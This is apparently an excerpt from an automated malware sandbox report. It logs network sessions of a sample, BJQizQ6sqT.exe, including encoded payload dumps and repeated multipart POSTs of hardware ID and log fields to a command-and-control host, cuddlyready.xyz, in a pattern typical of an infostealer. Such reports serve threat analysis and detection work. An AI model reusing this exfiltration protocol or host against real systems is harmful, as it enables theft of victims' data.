                                                                                                                                                          2024-12-23 08:16:44 UTC1369INData Raw: 73 70 54 74 31 78 4e 65 64 41 4c 6b 42 42 72 55 68 4a 73 56 4e 53 78 35 76 31 42 71 2b 79 36 44 76 5a 49 6e 6e 55 2b 6a 38 57 2b 50 39 65 43 37 2b 30 49 59 65 6f 77 4d 59 75 57 59 78 67 6c 4d 45 48 6d 75 53 54 66 32 44 34 71 46 6d 6b 71 67 4d 71 64 78 5a 37 2f 35 76 4b 2b 65 55 6b 31 2b 31 54 42 47 2f 49 57 48 4c 55 67 55 59 62 70 52 51 39 73 69 6e 35 48 4f 42 34 56 6e 6b 2f 45 54 6d 38 6e 67 6d 38 64 36 47 48 71 59 49 47 37 35 6e 4f 59 73 55 52 56 6c 6b 6a 41 4b 6d 67 34 2f 6b 63 59 33 6b 51 71 76 47 43 66 4f 7a 59 6d 62 78 32 4d 78 4a 37 41 51 54 73 47 49 79 68 46 63 44 45 6e 47 55 55 50 6a 4f 71 66 4e 6e 6a 2b 5a 65 36 75 35 44 34 76 74 34 4c 2f 33 64 69 52 61 6f 54 46 6a 7a 5a 69 48 4c 44 45 73 34 62 70 39 4f 39 4e 53 73 6f 58 37 45 38 52 54 75 38 41
                                                                                                                                                          Data Ascii: spTt1xNedALkBBrUhJsVNSx5v1Bq+y6DvZInnU+j8W+P9eC7+0IYeowMYuWYxglMEHmuSTf2D4qFmkqgMqdxZ7/5vK+eUk1+1TBG/IWHLUgUYbpRQ9sin5HOB4Vnk/ETm8ngm8d6GHqYIG75nOYsURVlkjAKmg4/kcY3kQqvGCfOzYmbx2MxJ7AQTsGIyhFcDEnGUUPjOqfNnj+Ze6u5D4vt4L/3diRaoTFjzZiHLDEs4bp9O9NSsoX7E8RTu8A
                                                                                                                                                          2024-12-23 08:16:44 UTC1369INData Raw: 4b 2f 71 55 77 6c 47 72 46 46 62 72 49 52 4f 49 51 41 67 54 49 61 46 42 38 4d 32 72 39 79 47 56 70 6b 32 70 2b 30 57 73 70 54 73 72 39 39 79 4b 41 36 4d 42 46 62 31 76 4e 6f 35 62 41 78 6c 6a 6d 55 66 36 79 4b 66 69 62 49 37 36 58 75 6e 30 54 4f 33 33 63 57 61 34 6c 49 73 4a 37 46 52 57 67 6e 59 79 79 57 45 49 46 32 32 54 56 4c 37 63 34 76 67 68 6a 65 51 55 73 62 78 45 35 50 68 2b 4b 66 66 65 67 68 53 6d 41 42 36 39 59 69 75 45 55 41 73 56 61 35 35 50 38 4d 65 6b 36 47 71 42 37 6c 54 6f 39 67 6d 69 76 58 77 2b 74 6f 7a 4d 4a 61 73 41 47 37 77 6a 44 49 68 61 42 52 35 31 31 46 32 77 32 75 7a 6d 62 63 71 77 46 4f 58 31 53 65 66 33 66 79 62 78 32 59 6b 53 71 77 38 62 74 47 73 33 6a 46 41 48 45 47 36 53 51 76 6e 48 71 66 4e 6b 67 2b 52 59 71 62 49 4a 36 2b 55
                                                                                                                                                          Data Ascii: K/qUwlGrFFbrIROIQAgTIaFB8M2r9yGVpk2p+0WspTsr99yKA6MBFb1vNo5bAxljmUf6yKfibI76Xun0TO33cWa4lIsJ7FRWgnYyyWEIF22TVL7c4vghjeQUsbxE5Ph+KffeghSmAB69YiuEUAsVa55P8Mek6GqB7lTo9gmivXw+tozMJasAG7wjDIhaBR511F2w2uzmbcqwFOX1Sef3fybx2YkSqw8btGs3jFAHEG6SQvnHqfNkg+RYqbIJ6+U
                                                                                                                                                          2024-12-23 08:16:44 UTC164INData Raw: 49 73 64 37 46 52 57 75 6d 67 72 68 56 6f 43 46 47 57 63 52 66 44 4f 70 2b 64 71 6a 65 39 53 35 50 52 45 36 66 35 36 49 76 7a 47 6a 78 71 6d 41 52 7a 7a 4c 33 6d 4d 54 45 74 42 49 37 4e 4f 31 39 4f 33 38 33 66 4b 39 78 72 77 76 45 37 67 76 53 4e 6d 39 64 75 46 48 71 51 45 47 62 78 6c 4e 34 31 53 42 68 78 73 6e 6c 44 32 7a 61 48 71 62 6f 48 36 56 4f 54 34 52 65 6a 31 63 43 79 32 6d 73 77 57 74 45 78 4f 38 31 51 30 68 46 51 49 44 79 4f 4c 44 4f 65 44 71 2b 30 68 30 71 68 59 35 2f 78 0d 0a
                                                                                                                                                          Data Ascii: Isd7FRWumgrhVoCFGWcRfDOp+dqje9S5PRE6f56IvzGjxqmARzzL3mMTEtBI7NO19O383fK9xrwvE7gvSNm9duFHqQEGbxlN41SBhxsnlD2zaHqboH6VOT4Rej1cCy2mswWtExO81Q0hFQIDyOLDOeDq+0h0qhY5/x
                                                                                                                                                          2024-12-23 08:16:44 UTC1369INData Raw: 33 63 64 39 0d 0a 47 34 50 46 77 4c 76 66 59 67 68 61 70 42 52 36 37 63 7a 69 50 58 41 6f 58 62 4a 56 47 2b 38 61 6f 35 6d 57 4d 35 78 53 6e 76 45 37 30 76 53 4e 6d 32 66 4f 35 55 34 30 32 56 71 77 76 49 4d 74 54 42 31 6b 37 31 45 37 39 7a 36 54 75 5a 34 50 6b 58 75 44 33 52 65 66 35 64 79 2f 7a 30 6f 30 55 71 51 30 53 76 32 73 2f 69 46 63 45 46 6d 79 63 41 72 43 44 71 2f 6b 68 30 71 68 78 2f 76 64 48 36 72 31 6b 61 4f 2b 55 69 78 33 73 56 46 61 2f 61 44 2b 4e 55 51 63 59 5a 5a 78 48 39 73 65 74 35 32 65 4a 35 31 44 73 2f 55 62 6f 38 58 55 73 39 39 57 41 47 71 4d 48 45 2f 4d 76 65 59 78 4d 53 30 45 6a 70 55 48 6f 31 4c 7a 74 49 5a 57 6d 54 61 6e 37 52 61 79 6c 4f 79 66 6b 33 6f 59 66 71 51 4d 54 73 47 34 2b 68 6c 49 48 45 32 71 63 52 50 48 4b 76 75 4a 74
                                                                                                                                                          Data Ascii: 3cd9G4PFwLvfYghapBR67cziPXAoXbJVG+8ao5mWM5xSnvE70vSNm2fO5U402VqwvIMtTB1k71E79z6TuZ4PkXuD3Ref5dy/z0o0UqQ0Sv2s/iFcEFmycArCDq/kh0qhx/vdH6r1kaO+Uix3sVFa/aD+NUQcYZZxH9set52eJ51Ds/Ubo8XUs99WAGqMHE/MveYxMS0EjpUHo1LztIZWmTan7RaylOyfk3oYfqQMTsG4+hlIHE2qcRPHKvuJt
                                                                                                                                                          2024-12-23 08:16:44 UTC1369INData Raw: 33 78 53 66 37 79 66 43 48 2f 33 35 34 62 71 77 73 64 75 32 6f 32 6a 55 59 48 46 33 47 52 55 4f 79 44 34 71 46 6d 6b 71 67 4d 71 63 70 4f 2f 4f 31 34 5a 4d 66 43 6a 77 65 6e 41 52 72 7a 66 6e 65 53 46 41 77 56 49 38 77 43 2b 4d 79 6c 34 6d 36 4c 34 56 6a 6b 2b 55 44 70 2f 48 30 69 2f 4e 36 4d 46 36 6f 4e 45 37 6c 69 4f 49 46 64 44 42 46 6b 6c 31 43 2b 6a 65 7a 6d 65 63 71 77 46 4d 44 37 57 2b 4c 74 4f 7a 6d 34 7a 63 77 57 6f 45 78 4f 38 32 55 7a 68 46 41 4d 46 57 57 52 52 50 50 43 6f 2b 42 68 68 65 78 66 34 50 70 49 34 66 68 32 49 75 54 65 68 78 36 67 42 52 71 2b 49 58 66 4c 55 78 4e 5a 4f 39 52 7a 38 38 32 69 35 6e 66 4b 39 78 72 77 76 45 37 67 76 53 4e 6d 39 39 69 44 45 71 4d 50 46 62 4a 72 4b 35 6c 59 41 68 46 6d 6d 45 6e 77 78 62 37 6e 62 6f 50 72 56
                                                                                                                                                          Data Ascii: 3xSf7yfCH/354bqwsdu2o2jUYHF3GRUOyD4qFmkqgMqcpO/O14ZMfCjwenARrzfneSFAwVI8wC+Myl4m6L4Vjk+UDp/H0i/N6MF6oNE7liOIFdDBFkl1C+jezmecqwFMD7W+LtOzm4zcwWoExO82UzhFAMFWWRRPPCo+Bhhexf4PpI4fh2IuTehx6gBRq+IXfLUxNZO9Rz882i5nfK9xrwvE7gvSNm99iDEqMPFbJrK5lYAhFmmEnwxb7nboPrV
                                                                                                                                                          2024-12-23 08:16:44 UTC1369INData Raw: 73 73 7a 73 33 38 63 58 4d 53 62 6f 63 41 62 52 2b 64 35 49 55 44 42 55 6a 7a 41 4c 34 79 71 72 6d 5a 34 54 36 55 65 2f 7a 52 75 58 30 66 79 37 31 31 49 67 56 71 77 6b 56 76 32 6f 2b 69 46 73 50 45 47 32 64 54 62 36 4e 37 4f 5a 35 79 72 41 55 79 4f 64 4b 34 50 41 37 4f 62 6a 4e 7a 42 61 67 54 45 37 7a 62 54 65 4f 56 41 45 66 5a 35 46 45 39 4d 61 73 36 6d 4b 46 37 46 4c 74 38 30 6e 6e 39 48 6f 67 38 39 36 48 46 36 45 50 45 4c 55 68 64 38 74 54 45 31 6b 37 31 47 4c 6c 7a 71 44 6d 49 5a 57 6d 54 61 6e 37 52 61 79 6c 4f 79 33 36 30 49 73 52 6f 51 38 65 74 6d 55 7a 6a 6c 51 44 43 32 75 55 52 65 7a 52 72 4f 68 6b 68 75 74 55 37 66 70 41 36 76 35 2f 5a 72 69 55 69 77 6e 73 56 46 61 65 62 54 36 69 55 78 42 5a 66 4e 70 62 76 73 53 67 6f 54 6e 4b 36 56 2f 6a 38 30
                                                                                                                                                          Data Ascii: sszs38cXMSbocAbR+d5IUDBUjzAL4yqrmZ4T6Ue/zRuX0fy711IgVqwkVv2o+iFsPEG2dTb6N7OZ5yrAUyOdK4PA7ObjNzBagTE7zbTeOVAEfZ5FE9Mas6mKF7FLt80nn9Hog896HF6EPELUhd8tTE1k71GLlzqDmIZWmTan7RaylOy360IsRoQ8etmUzjlQDC2uURezRrOhkhutU7fpA6v5/ZriUiwnsVFaebT6iUxBZfNpbvsSgoTnK6V/j80
                                                                                                                                                          2024-12-23 08:16:44 UTC1369INData Raw: 5a 76 65 55 31 43 69 31 54 41 44 7a 4f 57 76 46 46 42 6c 5a 4f 39 51 46 2f 64 47 2b 35 32 4b 63 36 78 50 58 77 6d 37 36 39 33 77 32 38 63 4f 44 55 65 4a 4d 47 66 4d 35 41 4d 74 64 44 41 4a 79 67 6b 2f 75 78 4f 7a 65 4c 38 72 77 46 4c 47 38 66 4f 2f 7a 64 53 48 67 78 63 45 32 75 67 59 52 6f 32 59 75 68 42 52 46 57 57 58 55 47 71 32 4e 37 4f 56 77 79 72 41 45 75 36 63 63 76 36 6f 72 64 4f 6d 61 6c 56 47 36 54 45 37 68 4c 33 6d 5a 46 46 4e 5a 4a 4a 64 51 37 4d 57 76 39 32 4c 4e 31 6d 72 4f 35 6b 54 71 36 6d 6f 59 79 4e 4f 57 48 4b 6f 62 42 2f 39 30 4f 6f 56 61 44 41 38 6a 32 67 4c 78 67 2f 54 59 49 63 4b 6f 61 36 65 38 55 61 79 6c 4f 78 50 31 32 6f 49 57 75 68 31 62 6c 48 73 30 6a 55 4d 61 57 53 33 55 52 4c 36 62 2f 4b 38 68 6a 76 6b 55 73 61 77 62 74 36 67
                                                                                                                                                          Data Ascii: ZveU1Ci1TADzOWvFFBlZO9QF/dG+52Kc6xPXwm7693w28cODUeJMGfM5AMtdDAJygk/uxOzeL8rwFLG8fO/zdSHgxcE2ugYRo2YuhBRFWWXUGq2N7OVwyrAEu6ccv6ordOmalVG6TE7hL3mZFFNZJJdQ7MWv92LN1mrO5kTq6moYyNOWHKobB/90OoVaDA8j2gLxg/TYIcKoa6e8UaylOxP12oIWuh1blHs0jUMaWS3URL6b/K8hjvkUsawbt6g
                                                                                                                                                          2024-12-23 08:16:44 UTC1369INData Raw: 4a 73 65 6b 6a 49 44 73 47 38 33 6a 45 49 61 57 53 33 55 54 62 36 62 6c 61 45 70 79 74 63 61 71 65 51 4a 74 4c 31 4f 4a 66 6a 61 69 77 65 39 51 54 47 39 5a 6a 69 64 52 42 77 57 49 39 6f 43 2b 49 50 30 73 79 2f 4b 37 45 57 70 70 42 6d 2b 70 69 35 31 6f 59 54 65 44 75 49 56 56 71 55 68 59 64 6b 61 53 77 73 6a 7a 41 4b 35 77 4c 37 7a 5a 34 6e 2b 56 36 37 43 64 38 76 7a 66 43 66 67 78 4a 73 65 34 79 49 67 6b 6c 38 48 6e 6c 63 46 46 32 53 43 55 37 36 4e 37 4f 34 68 30 74 45 55 6f 62 78 32 6f 72 31 6a 5a 71 36 55 75 52 4b 69 41 68 47 6c 63 48 53 73 57 67 77 59 64 59 52 56 38 59 79 43 31 30 44 4b 70 68 54 76 76 42 47 2b 73 7a 73 69 35 35 54 55 51 66 35 58 51 2b 41 32 61 64 6c 4c 52 51 41 6a 67 67 4b 6d 6b 65 4b 68 63 38 71 77 46 4b 37 2f 57 2f 37 37 65 44 44 31
                                                                                                                                                          Data Ascii: JsekjIDsG83jEIaWS3UTb6blaEpytcaqeQJtL1OJfjaiwe9QTG9ZjidRBwWI9oC+IP0sy/K7EWppBm+pi51oYTeDuIVVqUhYdkaSwsjzAK5wL7zZ4n+V67Cd8vzfCfgxJse4yIgkl8HnlcFF2SCU76N7O4h0tEUobx2or1jZq6UuRKiAhGlcHSsWgwYdYRV8YyC10DKphTvvBG+szsi55TUQf5XQ+A2adlLRQAjggKmkeKhc8qwFK7/W/77eDD1


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.649727172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:16:46 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=3Y5WVLYMON
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 12817
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:46 UTC12817OUTData Raw: 2d 2d 33 59 35 57 56 4c 59 4d 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 59 35 57 56 4c 59 4d 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 59 35 57 56 4c 59 4d 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 59 35 57 56 4c 59 4d 4f 4e 0d 0a 43 6f
                                                                                                                                                          Data Ascii: --3Y5WVLYMONContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--3Y5WVLYMONContent-Disposition: form-data; name="pid"2--3Y5WVLYMONContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3Y5WVLYMONCo
                                                                                                                                                          2024-12-23 08:16:47 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:47 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=q55j6pgm20ahsoj4ri2u0gddne; expires=Fri, 18 Apr 2025 02:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbM%2BuhSCkVSq%2BYlDvLlQ9vH0v%2FtWPZ%2BpT%2Fx668TGClYlaJnKieE1kpxZ4V54eIbg7uP6Y2BQR%2BVdzPG2xKO0aV8u16Lm5%2Fwz3CDc4epFw4DEQLeRgg9dxWfRaaee6LArSZY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9541ed84233-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1755&rtt_var=668&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13748&delivery_rate=1624930&cwnd=219&unsent_bytes=0&cid=b9d53e98b5ebc918&ts=1067&x=0"
                                                                                                                                                          2024-12-23 08:16:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                          2024-12-23 08:16:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.649728172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:16:49 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=YHM4QLNTIXGPL8F56EK
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 15117
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:49 UTC15117OUTData Raw: 2d 2d 59 48 4d 34 51 4c 4e 54 49 58 47 50 4c 38 46 35 36 45 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 48 4d 34 51 4c 4e 54 49 58 47 50 4c 38 46 35 36 45 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 48 4d 34 51 4c 4e 54 49 58 47 50 4c 38 46 35 36 45 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                          Data Ascii: --YHM4QLNTIXGPL8F56EKContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--YHM4QLNTIXGPL8F56EKContent-Disposition: form-data; name="pid"2--YHM4QLNTIXGPL8F56EKContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                          2024-12-23 08:16:50 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:50 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=6dlroooforsnpvf04ic2inijil; expires=Fri, 18 Apr 2025 02:03:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fdeu8%2F7D4ywDW22%2FguGOXVlO5fMjUMhAiB6rY%2FR3K22QJ%2BFJII0MyqNdX3d8BUyqeb4%2BRKGEcMjcWFDqCdbtghL2WbX46DHS0hH5jhLwX41P92POAMwLpfjiXgW0TM%2Foz7I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9643c8418b8-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1533&rtt_var=584&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16057&delivery_rate=1859872&cwnd=186&unsent_bytes=0&cid=9dac58e003b13733&ts=1284&x=0"
                                                                                                                                                          2024-12-23 08:16:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                          2024-12-23 08:16:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          4192.168.2.649739172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:16:51 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=A3I60YPXCY
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 19921
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:51 UTC15331OUTData Raw: 2d 2d 41 33 49 36 30 59 50 58 43 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 33 49 36 30 59 50 58 43 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 33 49 36 30 59 50 58 43 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 33 49 36 30 59 50 58 43 59 0d 0a 43 6f
                                                                                                                                                          Data Ascii: --A3I60YPXCYContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--A3I60YPXCYContent-Disposition: form-data; name="pid"3--A3I60YPXCYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--A3I60YPXCYCo
                                                                                                                                                          2024-12-23 08:16:51 UTC4590OUTData Raw: 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: ?2+?2+?o?Mp5p_oI
                                                                                                                                                          2024-12-23 08:16:52 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:52 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=hs67i93j2b09jbrcvaflc6g6j3; expires=Fri, 18 Apr 2025 02:03:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AT9DmR4zAgD3WAm5EF6u6CL6h7LqCYgtMMKM368PeVqRu8%2FfKy5b4qOrNBhPdJ0NMWkNrXPwpT18xFk%2BuEQ%2FMCchZjVjbQxyXRV1VkK3eOamoEj8k9%2B1HSxQptKVifiyCA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9756f4943c8-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2204&min_rtt=2202&rtt_var=827&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20874&delivery_rate=1326067&cwnd=192&unsent_bytes=0&cid=7f2e13af24fef404&ts=950&x=0"
                                                                                                                                                          2024-12-23 08:16:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                          2024-12-23 08:16:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          5192.168.2.649746172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:16:54 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=OSG0OVPTVU5Q
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 1227
                                                                                                                                                          Host: cuddlyready.xyz
